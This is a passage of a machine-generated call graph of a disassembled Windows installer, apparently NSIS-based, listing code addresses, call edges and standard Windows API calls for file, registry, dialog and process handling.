3670->3671 3672 4019f8 lstrcmpW 3670->3672 3673 4019ec 3671->3673 3672->3673 3366 401e51 3367 402b38 18 API calls 3366->3367 3368 401e57 3367->3368 3369 40504b 25 API calls 3368->3369 3370 401e61 3369->3370 3371 40551c 2 API calls 3370->3371 3372 401e67 3371->3372 3373 401ec6 CloseHandle 3372->3373 3374 401e77 WaitForSingleObject 3372->3374 3376 402791 3372->3376 3373->3376 3375 401e89 3374->3375 3377 401e9b GetExitCodeProcess 3375->3377 3378 406144 2 API calls 3375->3378 3379 401eba 3377->3379 3380 401ead 3377->3380 3381 401e90 WaitForSingleObject 3378->3381 3379->3373 3383 401eb8 3379->3383 3384 405ce8 wsprintfW 3380->3384 3381->3375 3383->3373 3384->3383 3674 402251 3675 40225f 3674->3675 3676 402259 3674->3676 3678 402b38 18 API calls 3675->3678 3680 40226d 3675->3680 3677 402b38 18 API calls 3676->3677 3677->3675 3678->3680 3679 40227b 3682 402b38 18 API calls 3679->3682 3680->3679 3681 402b38 18 API calls 3680->3681 3681->3679 3683 402284 WritePrivateProfileStringW 3682->3683 3385 402452 3395 402c42 3385->3395 3387 40245c 3388 402b1b 18 API calls 3387->3388 3389 402465 3388->3389 3390 402489 RegEnumValueW 3389->3390 3391 40247d RegEnumKeyW 3389->3391 3392 402791 3389->3392 3390->3392 3393 4024a2 RegCloseKey 3390->3393 3391->3393 3393->3392 3396 402b38 18 API calls 3395->3396 3397 402c5b 3396->3397 3398 402c69 RegOpenKeyExW 3397->3398 3398->3387 3399 401752 3400 402b38 18 API calls 3399->3400 3401 401759 3400->3401 3402 401781 3401->3402 3403 401779 3401->3403 3439 405da1 lstrcpynW 3402->3439 3438 405da1 lstrcpynW 3403->3438 3406 40178c 3408 4057ec 3 API calls 3406->3408 3407 40177f 3410 406035 5 API calls 3407->3410 3409 401792 lstrcatW 3408->3409 3409->3407 3428 40179e 3410->3428 3411 4060e4 2 API calls 3411->3428 3412 4059e8 2 API calls 3412->3428 3414 4017b0 CompareFileTime 3414->3428 3415 401870 3417 40504b 25 API calls 3415->3417 3416 401847 3418 40504b 25 API calls 3416->3418 3426 40185c 3416->3426 3420 40187a 3417->3420 3418->3426 3419 405da1 lstrcpynW 3419->3428 3421 402fa0 33 API calls 3420->3421 3422 40188d 3421->3422 3423 4018a1 SetFileTime 3422->3423 3424 4018b3 CloseHandle 3422->3424 3423->3424 3424->3426 3427 4018c4 3424->3427 3425 405dc3 18 API calls 3425->3428 3429 4018c9 3427->3429 3430 4018dc 3427->3430 3428->3411 3428->3412 3428->3414 3428->3415 3428->3416 3428->3419 3428->3425 3433 40557d MessageBoxIndirectW 3428->3433 3437 405a0d GetFileAttributesW CreateFileW 3428->3437 3431 405dc3 18 API calls 3429->3431 3432 405dc3 18 API calls 3430->3432 3434 4018d1 lstrcatW 3431->3434 3435 4018e4 3432->3435 3433->3428 3434->3435 3436 40557d MessageBoxIndirectW 3435->3436 3436->3426 3437->3428 3438->3407 3439->3406 3440 4022d3 3441 402303 3440->3441 3442 4022d8 3440->3442 3444 402b38 18 API calls 3441->3444 3443 402c42 19 API calls 3442->3443 3446 4022df 3443->3446 3445 40230a 3444->3445 3453 402b78 RegOpenKeyExW 3445->3453 3447 4022e9 3446->3447 3452 402322 3446->3452 3448 402b38 18 API calls 3447->3448 3450 4022f0 RegDeleteValueW RegCloseKey 3448->3450 3450->3452 3459 402ba3 3453->3459 3461 402320 3453->3461 3454 402bc9 RegEnumKeyW 3455 402bdb RegCloseKey 3454->3455 3454->3459 3457 40610b 3 API calls 3455->3457 3456 402c00 RegCloseKey 3456->3461 3460 402beb 3457->3460 3458 402b78 3 API calls 3458->3459 3459->3454 3459->3455 3459->3456 3459->3458 3460->3461 3462 402c1b RegDeleteKeyW 3460->3462 3461->3452 3462->3461 3684 401ed4 3685 402b38 18 API calls 3684->3685 3686 401edb 3685->3686 3687 4060e4 2 API calls 3686->3687 3688 401ee1 3687->3688 3690 401ef2 3688->3690 3691 405ce8 wsprintfW 3688->3691 3691->3690 3692 4014d7 3693 402b1b 18 API calls 3692->3693 3694 4014dd Sleep 3693->3694 3696 4029c5 3694->3696 3697 40155b 3698 40296b 3697->3698 3701 405ce8 wsprintfW 3698->3701 3700 402970 3701->3700 3505 4023de 3506 402c42 19 API calls 3505->3506 3507 4023e8 3506->3507 3508 402b38 18 API calls 3507->3508 3509 4023f1 3508->3509 3510 4023fc RegQueryValueExW 3509->3510 3513 402791 3509->3513 3511 402422 RegCloseKey 3510->3511 3512 40241c 3510->3512 3511->3513 3512->3511 3516 405ce8 wsprintfW 3512->3516 3516->3511 3702 40165e 3703 402b38 18 API calls 3702->3703 3704 401665 3703->3704 3705 402b38 18 API calls 3704->3705 3706 40166e 3705->3706 3707 402b38 18 API calls 3706->3707 3708 401677 MoveFileW 3707->3708 3709 401683 3708->3709 3710 40168a 3708->3710 3711 401423 25 API calls 3709->3711 3712 4060e4 2 API calls 3710->3712 3714 402195 3710->3714 3711->3714 3713 401699 3712->3713 3713->3714 3715 405c3b 40 API calls 3713->3715 3715->3709 3716 401ce5 GetDlgItem GetClientRect 3717 402b38 18 API calls 3716->3717 3718 401d17 LoadImageW SendMessageW 3717->3718 3719 4029c5 3718->3719 3720 401d35 DeleteObject 3718->3720 3720->3719 3721 40206a 3722 402b38 18 API calls 3721->3722 3723 402071 3722->3723 3724 402b38 18 API calls 3723->3724 3725 40207b 3724->3725 3726 402b38 18 API calls 3725->3726 3727 402084 3726->3727 3728 402b38 18 API calls 3727->3728 3729 40208e 3728->3729 3730 402b38 18 API calls 3729->3730 3731 402098 3730->3731 3732 4020ac CoCreateInstance 3731->3732 3733 402b38 18 API calls 3731->3733 3736 4020cb 3732->3736 3733->3732 3734 401423 25 API calls 3735 402195 3734->3735 3736->3734 3736->3735 3271 40156b 3272 401584 3271->3272 3273 40157b ShowWindow 3271->3273 3274 401592 ShowWindow 3272->3274 3275 4029c5 3272->3275 3273->3272 3274->3275 3737 4024ec 3738 4024f1 3737->3738 3739 40250a 3737->3739 3740 402b1b 18 API calls 3738->3740 3741 402510 3739->3741 3742 40253c 3739->3742 3747 4024f8 3740->3747 3743 402b38 18 API calls 3741->3743 3744 402b38 18 API calls 3742->3744 3745 402517 WideCharToMultiByte lstrlenA 3743->3745 3746 402543 lstrlenW 3744->3746 3745->3747 3746->3747 3748 402565 WriteFile 3747->3748 3749 402791 3747->3749 3748->3749 3750 40276e 3751 402b38 18 API calls 3750->3751 3752 402775 FindFirstFileW 3751->3752 3753 402788 3752->3753 3754 40279d 3752->3754 3755 4027a6 3754->3755 3758 405ce8 wsprintfW 3754->3758 3759 405da1 lstrcpynW 3755->3759 3758->3755 3759->3753 3760 4018ef 3761 401926 3760->3761 3762 402b38 18 API calls 3761->3762 3763 40192b 3762->3763 3764 405629 71 API calls 3763->3764 3765 401934 3764->3765 3766 402571 3767 402b1b 18 API calls 3766->3767 3771 402580 3767->3771 3768 40269e 3769 4025c6 ReadFile 3769->3768 3769->3771 3770 405a90 ReadFile 3770->3771 3771->3768 3771->3769 3771->3770 3772 4026a0 3771->3772 3773 402606 MultiByteToWideChar 3771->3773 3775 4026b1 3771->3775 3776 40262c SetFilePointer MultiByteToWideChar 3771->3776 3778 405ce8 wsprintfW 3772->3778 3773->3771 3775->3768 3777 4026d2 SetFilePointer 3775->3777 3776->3771 3777->3768 3778->3768 3779 4014f1 SetForegroundWindow 3780 4029c5 3779->3780 3781 4018f2 3782 402b38 18 API calls 3781->3782 3783 4018f9 3782->3783 3784 40557d MessageBoxIndirectW 3783->3784 3785 401902 3784->3785 3463 401df3 3464 402b38 18 API calls 3463->3464 3465 401df9 3464->3465 3466 402b38 18 API calls 3465->3466 3467 401e02 3466->3467 3468 402b38 18 API calls 3467->3468 3469 401e0b 3468->3469 3470 402b38 18 API calls 3469->3470 3471 401e14 3470->3471 3475 401423 3471->3475 3474 401e4c 3476 40504b 25 API calls 3475->3476 3477 401431 ShellExecuteW 3476->3477 3477->3474 3791 4026f7 3792 4026fe 3791->3792 3794 402970 3791->3794 3793 402b1b 18 API calls 3792->3793 3795 402709 3793->3795 3796 402710 SetFilePointer 3795->3796 3796->3794 3797 402720 3796->3797 3799 405ce8 wsprintfW 3797->3799 3799->3794 3800 4040fa lstrcpynW lstrlenW 3801 402c7d 3802 402c8f SetTimer 3801->3802 3803 402ca8 3801->3803 3802->3803 3804 402cfd 3803->3804 3805 402cc2 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3803->3805 3805->3804 3806 4014ff 3807 401507 3806->3807 3809 40151a 3806->3809 3808 402b1b 18 API calls 3807->3808 3808->3809 3810 401000 3811 401037 BeginPaint GetClientRect 3810->3811 3812 40100c DefWindowProcW 3810->3812 3814 4010f3 3811->3814 3815 401179 3812->3815 3816 401073 CreateBrushIndirect FillRect DeleteObject 3814->3816 3817 4010fc 3814->3817 3816->3814 3818 401102 CreateFontIndirectW 3817->3818 3819 401167 EndPaint 3817->3819 3818->3819 3820 401112 6 API calls 3818->3820 3819->3815 3820->3819 3821 401a00 3822 402b38 18 API calls 3821->3822 3823 401a09 ExpandEnvironmentStringsW 3822->3823 3824 401a1d 3823->3824 3826 401a30 3823->3826 3825 401a22 lstrcmpW 3824->3825 3824->3826 3825->3826 3827 401b01 3828 402b38 18 API calls 3827->3828 3829 401b08 3828->3829 3830 402b1b 18 API calls 3829->3830 3831 401b11 wsprintfW 3830->3831 3832 4029c5 3831->3832 3833 404481 3834 4044ad 3833->3834 3835 4044be 3833->3835 3894 405561 GetDlgItemTextW 3834->3894 3837 4044ca GetDlgItem 3835->3837 3842 404529 3835->3842 3840 4044de 3837->3840 3838 40460d 3892 4047ae 3838->3892 3896 405561 GetDlgItemTextW 3838->3896 3839 4044b8 3841 406035 5 API calls 3839->3841 3844 4044f2 SetWindowTextW 3840->3844 3845 405897 4 API calls 3840->3845 3841->3835 3842->3838 3846 405dc3 18 API calls 3842->3846 3842->3892 3848 403fe6 19 API calls 3844->3848 3850 4044e8 3845->3850 3851 40459d SHBrowseForFolderW 3846->3851 3847 40463d 3852 4058f4 18 API calls 3847->3852 3853 40450e 3848->3853 3849 40404d 8 API calls 3854 4047c2 3849->3854 3850->3844 3858 4057ec 3 API calls 3850->3858 3851->3838 3855 4045b5 CoTaskMemFree 3851->3855 3856 404643 3852->3856 3857 403fe6 19 API calls 3853->3857 3859 4057ec 3 API calls 3855->3859 3897 405da1 lstrcpynW 3856->3897 3860 40451c 3857->3860 3858->3844 3861 4045c2 3859->3861 3895 40401b SendMessageW 3860->3895 3864 4045f9 SetDlgItemTextW 3861->3864 3869 405dc3 18 API calls 3861->3869 3864->3838 3865 404522 3867 40610b 3 API calls 3865->3867 3866 40465a 3868 40610b 3 API calls 3866->3868 3867->3842 3875 404662 3868->3875 3870 4045e1 lstrcmpiW 3869->3870 3870->3864 3873 4045f2 lstrcatW 3870->3873 3871 4046a1 3898 405da1 lstrcpynW 3871->3898 3873->3864 3874 4046a8 3876 405897 4 API calls 3874->3876 3875->3871 3879 405838 2 API calls 3875->3879 3881 4046f3 3875->3881 3877 4046ae GetDiskFreeSpaceW 3876->3877 3880 4046d1 MulDiv 3877->3880 3877->3881 3879->3875 3880->3881 3882 40475d 3881->3882 3884 40482f 21 API calls 3881->3884 3883 404780 3882->3883 3885 40140b 2 API calls 3882->3885 3899 404008 KiUserCallbackDispatcher 3883->3899 3886 40474f 3884->3886 3885->3883 3888 404754 3886->3888 3889 40475f SetDlgItemTextW 3886->3889 3891 40482f 21 API calls 3888->3891 3889->3882 3890 40479c 3890->3892 3900 404416 3890->3900 3891->3882 3892->3849 3894->3839 3895->3865 3896->3847 3897->3866 3898->3874 3899->3890 3901 404424 3900->3901 3902 404429 SendMessageW 3900->3902 3901->3902 3902->3892 3903 404183 3904 4042b5 3903->3904 3906 40419b 3903->3906 3905 40431f 3904->3905 3907 4043f1 3904->3907 3912 4042f0 GetDlgItem SendMessageW 3904->3912 3905->3907 3908 404329 GetDlgItem 3905->3908 3909 403fe6 19 API calls 3906->3909 3914 40404d 8 API calls 3907->3914 3910 4043b2 3908->3910 3911 404343 3908->3911 3913 404202 3909->3913 3910->3907 3919 4043c4 3910->3919 3911->3910 3918 404369 6 API calls 3911->3918 3934 404008 KiUserCallbackDispatcher 3912->3934 3916 403fe6 19 API calls 3913->3916 3917 4043ec 3914->3917 3921 40420f CheckDlgButton 3916->3921 3918->3910 3922 4043da 3919->3922 3923 4043ca SendMessageW 3919->3923 3920 40431a 3925 404416 SendMessageW 3920->3925 3932 404008 KiUserCallbackDispatcher 3921->3932 3922->3917 3924 4043e0 SendMessageW 3922->3924 3923->3922 3924->3917 3925->3905 3927 40422d GetDlgItem 3933 40401b SendMessageW 3927->3933 3929 404243 SendMessageW 3930 404260 GetSysColor 3929->3930 3931 404269 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3929->3931 3930->3931 3931->3917 3932->3927 3933->3929 3934->3920 3935 401f08 3936 402b38 18 API calls 3935->3936 3937 401f0f GetFileVersionInfoSizeW 3936->3937 3938 401f36 GlobalAlloc 3937->3938 3941 401f8c 3937->3941 3939 401f4a GetFileVersionInfoW 3938->3939 3938->3941 3940 401f59 VerQueryValueW 3939->3940 3939->3941 3940->3941 3942 401f72 3940->3942 3946 405ce8 wsprintfW 3942->3946 3944 401f7e 3947 405ce8 wsprintfW 3944->3947 3946->3944 3947->3941 3199 40518a 3200 405336 3199->3200 3201 4051ab GetDlgItem GetDlgItem GetDlgItem 3199->3201 3203 405367 3200->3203 3204 40533f GetDlgItem CreateThread CloseHandle 3200->3204 3244 40401b SendMessageW 3201->3244 3206 405392 3203->3206 3207 4053b7 3203->3207 3208 40537e ShowWindow ShowWindow 3203->3208 3204->3203 3267 40511e 5 API calls 3204->3267 3205 40521c 3213 405223 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3205->3213 3210 4053a6 3206->3210 3211 4053cc ShowWindow 3206->3211 3214 4053f2 3206->3214 3253 40404d 3207->3253 3249 40401b SendMessageW 3208->3249 3250 403fbf 3210->3250 3218 4053ec 3211->3218 3219 4053de 3211->3219 3220 405292 3213->3220 3221 405276 SendMessageW SendMessageW 3213->3221 3214->3207 3215 405400 SendMessageW 3214->3215 3217 4053c5 3215->3217 3222 405419 CreatePopupMenu 3215->3222 3226 403fbf SendMessageW 3218->3226 3225 40504b 25 API calls 3219->3225 3223 4052a5 3220->3223 3224 405297 SendMessageW 3220->3224 3221->3220 3227 405dc3 18 API calls 3222->3227 3245 403fe6 3223->3245 3224->3223 3225->3218 3226->3214 3229 405429 AppendMenuW 3227->3229 3231 405446 GetWindowRect 3229->3231 3232 405459 TrackPopupMenu 3229->3232 3230 4052b5 3233 4052f2 GetDlgItem SendMessageW 3230->3233 3234 4052be ShowWindow 3230->3234 3231->3232 3232->3217 3235 405474 3232->3235 3233->3217 3238 405319 SendMessageW SendMessageW 3233->3238 3236 4052e1 3234->3236 3237 4052d4 ShowWindow 3234->3237 3239 405490 SendMessageW 3235->3239 3248 40401b SendMessageW 3236->3248 3237->3236 3238->3217 3239->3239 3240 4054ad OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3239->3240 3242 4054d2 SendMessageW 3240->3242 3242->3242 3243 4054fb GlobalUnlock SetClipboardData CloseClipboard 3242->3243 3243->3217 3244->3205 3246 405dc3 18 API calls 3245->3246 3247 403ff1 SetDlgItemTextW 3246->3247 3247->3230 3248->3233 3249->3206 3251 403fc6 3250->3251 3252 403fcc SendMessageW 3250->3252 3251->3252 3252->3207 3254 404065 GetWindowLongW 3253->3254 3255 4040ee 3253->3255 3254->3255 3256 404076 3254->3256 3255->3217 3257 404085 GetSysColor 3256->3257 3258 404088 3256->3258 3257->3258 3259 404098 SetBkMode 3258->3259 3260 40408e SetTextColor 3258->3260 3261 4040b0 GetSysColor 3259->3261 3262 4040b6 3259->3262 3260->3259 3261->3262 3263 4040c7 3262->3263 3264 4040bd SetBkColor 3262->3264 3263->3255 3265 4040e1 CreateBrushIndirect 3263->3265 3266 4040da DeleteObject 3263->3266 3264->3263 3265->3255 3266->3265 3276 403b0e 3277 403c61 3276->3277 3278 403b26 3276->3278 3280 403c72 GetDlgItem GetDlgItem 3277->3280 3281 403cb2 3277->3281 3278->3277 3279 403b32 3278->3279 3282 403b50 3279->3282 3283 403b3d SetWindowPos 3279->3283 3284 403fe6 19 API calls 3280->3284 3285 403d0c 3281->3285 3290 401389 2 API calls 3281->3290 3287 403b55 ShowWindow 3282->3287 3288 403b6d 3282->3288 3283->3282 3289 403c9c SetClassLongW 3284->3289 3286 404032 SendMessageW 3285->3286 3308 403c5c 3285->3308 3306 403d1e 3286->3306 3287->3288 3291 403b75 DestroyWindow 3288->3291 3292 403b8f 3288->3292 3293 40140b 2 API calls 3289->3293 3294 403ce4 3290->3294 3345 403f6f 3291->3345 3295 403b94 SetWindowLongW 3292->3295 3296 403ba5 3292->3296 3293->3281 3294->3285 3297 403ce8 SendMessageW 3294->3297 3295->3308 3300 403bb1 GetDlgItem 3296->3300 3301 403c4e 3296->3301 3297->3308 3298 40140b 2 API calls 3298->3306 3299 403f71 DestroyWindow EndDialog 3299->3345 3302 403be1 3300->3302 3303 403bc4 SendMessageW IsWindowEnabled 3300->3303 3304 40404d 8 API calls 3301->3304 3307 403be6 3302->3307 3310 403bee 3302->3310 3311 403c35 SendMessageW 3302->3311 3312 403c01 3302->3312 3303->3302 3303->3308 3304->3308 3305 403fa0 ShowWindow 3305->3308 3306->3298 3306->3299 3306->3308 3309 405dc3 18 API calls 3306->3309 3318 403fe6 19 API calls 3306->3318 3321 403fe6 19 API calls 3306->3321 3336 403eb1 DestroyWindow 3306->3336 3313 403fbf SendMessageW 3307->3313 3309->3306 3310->3307 3310->3311 3311->3301 3314 403c09 3312->3314 3315 403c1e 3312->3315 3316 403c1c 3313->3316 3319 40140b 2 API calls 3314->3319 3317 40140b 2 API calls 3315->3317 3316->3301 3320 403c25 3317->3320 3318->3306 3319->3307 3320->3301 3320->3307 3322 403d99 GetDlgItem 3321->3322 3323 403db6 ShowWindow KiUserCallbackDispatcher 3322->3323 3324 403dae 3322->3324 3346 404008 KiUserCallbackDispatcher 3323->3346 3324->3323 3326 403de0 EnableWindow 3329 403df4 3326->3329 3327 403df9 GetSystemMenu EnableMenuItem SendMessageW 3328 403e29 SendMessageW 3327->3328 3327->3329 3328->3329 3329->3327 3347 40401b SendMessageW 3329->3347 3348 405da1 lstrcpynW 3329->3348 3332 403e57 lstrlenW 3333 405dc3 18 API calls 3332->3333 3334 403e6d SetWindowTextW 3333->3334 3335 401389 2 API calls 3334->3335 3335->3306 3337 403ecb CreateDialogParamW 3336->3337 3336->3345 3338 403efe 3337->3338 3337->3345 3339 403fe6 19 API calls 3338->3339 3340 403f09 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3339->3340 3341 401389 2 API calls 3340->3341 3342 403f4f 3341->3342 3342->3308 3343 403f57 ShowWindow 3342->3343 3344 404032 SendMessageW 3343->3344 3344->3345 3345->3305 3345->3308 3346->3326 3347->3329 3348->3332 3948 401491 3949 40504b 25 API calls 3948->3949 3950 401498 3949->3950 3951 402293 3952 402b38 18 API calls 3951->3952 3953 4022a2 3952->3953 3954 402b38 18 API calls 3953->3954 3955 4022ab 3954->3955 3956 402b38 18 API calls 3955->3956 3957 4022b5 GetPrivateProfileStringW 3956->3957 3478 401718 3479 402b38 18 API calls 3478->3479 3480 40171f SearchPathW 3479->3480 3481 40173a 3480->3481 3958 401f98 3959 401faa 3958->3959 3969 40205c 3958->3969 3960 402b38 18 API calls 3959->3960 3962 401fb1 3960->3962 3961 401423 25 API calls 3967 402195 3961->3967 3963 402b38 18 API calls 3962->3963 3964 401fba 3963->3964 3965 401fd0 LoadLibraryExW 3964->3965 3966 401fc2 GetModuleHandleW 3964->3966 3968 401fe1 3965->3968 3965->3969 3966->3965 3966->3968 3978 406177 WideCharToMultiByte 3968->3978 3969->3961 3972 401ff2 3975 401423 25 API calls 3972->3975 3976 402002 3972->3976 3973 40202b 3974 40504b 25 API calls 3973->3974 3974->3976 3975->3976 3976->3967 3977 40204e FreeLibrary 3976->3977 3977->3967 3979 4061a1 GetProcAddress 3978->3979 3980 401fec 3978->3980 3979->3980 3980->3972 3980->3973 3501 40159b 3502 402b38 18 API calls 3501->3502 3503 4015a2 SetFileAttributesW 3502->3503 3504 4015b4 3503->3504 3517 40219e 3518 402b38 18 API calls 3517->3518 3519 4021a4 3518->3519 3520 402b38 18 API calls 3519->3520 3521 4021ad 3520->3521 3522 402b38 18 API calls 3521->3522 3523 4021b6 3522->3523 3524 4060e4 2 API calls 3523->3524 3525 4021bf 3524->3525 3526 4021d0 lstrlenW lstrlenW 3525->3526 3527 4021c3 3525->3527 3529 40504b 25 API calls 3526->3529 3528 40504b 25 API calls 3527->3528 3531 4021cb 3527->3531 3528->3531 3530 40220e SHFileOperationW 3529->3530 3530->3527 3530->3531 3981 40149e 3982 40223c 3981->3982 3983 4014ac PostQuitMessage 3981->3983 3983->3982 3984 4029a0 SendMessageW 3985 4029c5 3984->3985 3986 4029ba InvalidateRect 3984->3986 3986->3985 3987 401b22 3988 401b73 3987->3988 3989 401b2f 3987->3989 3991 401b78 3988->3991 3992 401b9d GlobalAlloc 3988->3992 3990 402229 3989->3990 3996 401b46 3989->3996 3994 405dc3 18 API calls 3990->3994 3998 401bb8 3991->3998 4008 405da1 lstrcpynW 3991->4008 3993 405dc3 18 API calls 3992->3993 3993->3998 3999 402236 3994->3999 4006 405da1 lstrcpynW 3996->4006 3997 401b8a GlobalFree 3997->3998 4002 40557d MessageBoxIndirectW 3999->4002 4001 401b55 4007 405da1 lstrcpynW 4001->4007 4002->3998 4004 401b64 4009 405da1 lstrcpynW 4004->4009 4006->4001 4007->4004 4008->3997 4009->3998 4010 402222 4011 402229 4010->4011 4013 40223c 4010->4013 4012 405dc3 18 API calls 4011->4012 4014 402236 4012->4014 4015 40557d MessageBoxIndirectW 4014->4015 4015->4013 2711 401924 2712 401926 2711->2712 2717 402b38 2712->2717 2718 402b44 2717->2718 2763 405dc3 2718->2763 2721 40192b 2723 405629 2721->2723 2802 4058f4 2723->2802 2726 405651 DeleteFileW 2728 401934 2726->2728 2727 405668 2730 405793 2727->2730 2816 405da1 lstrcpynW 2727->2816 2730->2728 2846 4060e4 FindFirstFileW 2730->2846 2731 40568e 2732 4056a1 2731->2732 2733 405694 lstrcatW 2731->2733 2817 405838 lstrlenW 2732->2817 2734 4056a7 2733->2734 2737 4056b7 lstrcatW 2734->2737 2738 4056ad 2734->2738 2740 4056c2 lstrlenW FindFirstFileW 2737->2740 2738->2737 2738->2740 2742 405788 2740->2742 2761 4056e4 2740->2761 2741 4057b1 2849 4057ec lstrlenW CharPrevW 2741->2849 2742->2730 2745 40576b FindNextFileW 2748 405781 FindClose 2745->2748 2745->2761 2746 4055e1 5 API calls 2749 4057c3 2746->2749 2748->2742 2750 4057c7 2749->2750 2751 4057dd 2749->2751 2750->2728 2754 40504b 25 API calls 2750->2754 2753 40504b 25 API calls 2751->2753 2753->2728 2756 4057d4 2754->2756 2755 405629 64 API calls 2755->2761 2757 405c3b 40 API calls 2756->2757 2759 4057db 2757->2759 2758 40504b 25 API calls 2758->2745 2759->2728 2761->2745 2761->2755 2761->2758 2821 405da1 lstrcpynW 2761->2821 2822 4055e1 2761->2822 2830 40504b 2761->2830 2841 405c3b 2761->2841 2764 405dd0 2763->2764 2765 40601b 2764->2765 2768 405e83 GetVersion 2764->2768 2769 405fe9 lstrlenW 2764->2769 2771 405dc3 10 API calls 2764->2771 2774 405efe GetSystemDirectoryW 2764->2774 2775 405f11 GetWindowsDirectoryW 2764->2775 2776 406035 5 API calls 2764->2776 2777 405dc3 10 API calls 2764->2777 2778 405f8a lstrcatW 2764->2778 2779 405f45 SHGetSpecialFolderLocation 2764->2779 2790 405c6e RegOpenKeyExW 2764->2790 2795 405ce8 wsprintfW 2764->2795 2796 405da1 lstrcpynW 2764->2796 2766 402b65 2765->2766 2797 405da1 lstrcpynW 2765->2797 2766->2721 2781 406035 2766->2781 2768->2764 2769->2764 2771->2769 2774->2764 2775->2764 2776->2764 2777->2764 2778->2764 2779->2764 2780 405f5d SHGetPathFromIDListW CoTaskMemFree 2779->2780 2780->2764 2788 406042 2781->2788 2782 4060b8 2783 4060bd CharPrevW 2782->2783 2785 4060de 2782->2785 2783->2782 2784 4060ab CharNextW 2784->2782 2784->2788 2785->2721 2787 406097 CharNextW 2787->2788 2788->2782 2788->2784 2788->2787 2789 4060a6 CharNextW 2788->2789 2798 405819 2788->2798 2789->2784 2791 405ce2 2790->2791 2792 405ca2 RegQueryValueExW 2790->2792 2791->2764 2793 405cc3 RegCloseKey 2792->2793 2793->2791 2795->2764 2796->2764 2797->2766 2799 40581f 2798->2799 2800 405835 2799->2800 2801 405826 CharNextW 2799->2801 2800->2788 2801->2799 2852 405da1 lstrcpynW 2802->2852 2804 405905 2853 405897 CharNextW CharNextW 2804->2853 2807 405649 2807->2726 2807->2727 2808 406035 5 API calls 2813 40591b 2808->2813 2809 40594c lstrlenW 2810 405957 2809->2810 2809->2813 2812 4057ec 3 API calls 2810->2812 2811 4060e4 2 API calls 2811->2813 2814 40595c GetFileAttributesW 2812->2814 2813->2807 2813->2809 2813->2811 2815 405838 2 API calls 2813->2815 2814->2807 2815->2809 2816->2731 2818 405846 2817->2818 2819 405858 2818->2819 2820 40584c CharPrevW 2818->2820 2819->2734 2820->2818 2820->2819 2821->2761 2859 4059e8 GetFileAttributesW 2822->2859 2825 405604 DeleteFileW 2828 40560a 2825->2828 2826 4055fc RemoveDirectoryW 2826->2828 2827 40560e 2827->2761 2828->2827 2829 40561a SetFileAttributesW 2828->2829 2829->2827 2831 405066 2830->2831 2840 405108 2830->2840 2832 405082 lstrlenW 2831->2832 2833 405dc3 18 API calls 2831->2833 2834 405090 lstrlenW 2832->2834 2835 4050ab 2832->2835 2833->2832 2838 4050a2 lstrcatW 2834->2838 2834->2840 2836 4050b1 SetWindowTextW 2835->2836 2837 4050be 2835->2837 2836->2837 2839 4050c4 SendMessageW SendMessageW SendMessageW 2837->2839 2837->2840 2838->2835 2839->2840 2840->2761 2862 40610b GetModuleHandleA 2841->2862 2845 405c63 2845->2761 2847 4057ad 2846->2847 2848 4060fa FindClose 2846->2848 2847->2728 2847->2741 2848->2847 2850 4057b7 2849->2850 2851 405808 lstrcatW 2849->2851 2850->2746 2851->2850 2852->2804 2854 4058b4 2853->2854 2855 4058c6 2853->2855 2854->2855 2856 4058c1 CharNextW 2854->2856 2857 405819 CharNextW 2855->2857 2858 4058ea 2855->2858 2856->2858 2857->2855 2858->2807 2858->2808 2860 4055ed 2859->2860 2861 4059fa SetFileAttributesW 2859->2861 2860->2825 2860->2826 2860->2827 2861->2860 2863 406132 GetProcAddress 2862->2863 2864 406127 LoadLibraryA 2862->2864 2865 405c42 2863->2865 2864->2863 2864->2865 2865->2845 2866 405abf lstrcpyW 2865->2866 2867 405ae8 2866->2867 2868 405b0e GetShortPathNameW 2866->2868 2891 405a0d GetFileAttributesW CreateFileW 2867->2891 2870 405b23 2868->2870 2871 405c35 2868->2871 2870->2871 2873 405b2b wsprintfA 2870->2873 2871->2845 2872 405af2 CloseHandle GetShortPathNameW 2872->2871 2875 405b06 2872->2875 2874 405dc3 18 API calls 2873->2874 2876 405b53 2874->2876 2875->2868 2875->2871 2892 405a0d GetFileAttributesW CreateFileW 2876->2892 2878 405b60 2878->2871 2879 405b6f GetFileSize GlobalAlloc 2878->2879 2880 405b91 2879->2880 2881 405c2e CloseHandle 2879->2881 2893 405a90 ReadFile 2880->2893 2881->2871 2886 405bb0 lstrcpyA 2889 405bd2 2886->2889 2887 405bc4 2888 405972 4 API calls 2887->2888 2888->2889 2890 405c09 SetFilePointer WriteFile GlobalFree 2889->2890 2890->2881 2891->2872 2892->2878 2894 405aae 2893->2894 2894->2881 2895 405972 lstrlenA 2894->2895 2896 4059b3 lstrlenA 2895->2896 2897 4059bb 2896->2897 2898 40598c lstrcmpiA 2896->2898 2897->2886 2897->2887 2898->2897 2899 4059aa CharNextA 2898->2899 2899->2896 4016 402727 4017 40272e 4016->4017 4019 4029c5 4016->4019 4018 402734 FindClose 4017->4018 4018->4019 2911 403229 #17 SetErrorMode OleInitialize 2912 40610b 3 API calls 2911->2912 2913 40326c SHGetFileInfoW 2912->2913 2984 405da1 lstrcpynW 2913->2984 2915 403297 GetCommandLineW 2985 405da1 lstrcpynW 2915->2985 2917 4032a9 GetModuleHandleW 2918 4032c1 2917->2918 2919 405819 CharNextW 2918->2919 2920 4032d0 CharNextW 2919->2920 2930 4032e0 2920->2930 2921 4033b5 2922 4033c9 GetTempPathW 2921->2922 2986 4031f5 2922->2986 2924 4033e1 2925 4033e5 GetWindowsDirectoryW lstrcatW 2924->2925 2926 40343b DeleteFileW 2924->2926 2928 4031f5 11 API calls 2925->2928 2994 402d67 GetTickCount GetModuleFileNameW 2926->2994 2927 405819 CharNextW 2927->2930 2931 403401 2928->2931 2930->2921 2930->2927 2935 4033b7 2930->2935 2931->2926 2934 403405 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2931->2934 2932 40344f 2933 4034e7 2932->2933 2936 4034d7 2932->2936 2940 405819 CharNextW 2932->2940 3079 403691 2933->3079 2939 4031f5 11 API calls 2934->2939 3076 405da1 lstrcpynW 2935->3076 3022 40376b 2936->3022 2943 403433 2939->2943 2944 40346a 2940->2944 2943->2926 2943->2933 2951 4034b1 2944->2951 2952 403516 lstrcatW lstrcmpiW 2944->2952 2945 403500 3086 40557d 2945->3086 2946 4035f6 2947 403679 ExitProcess 2946->2947 2949 40610b 3 API calls 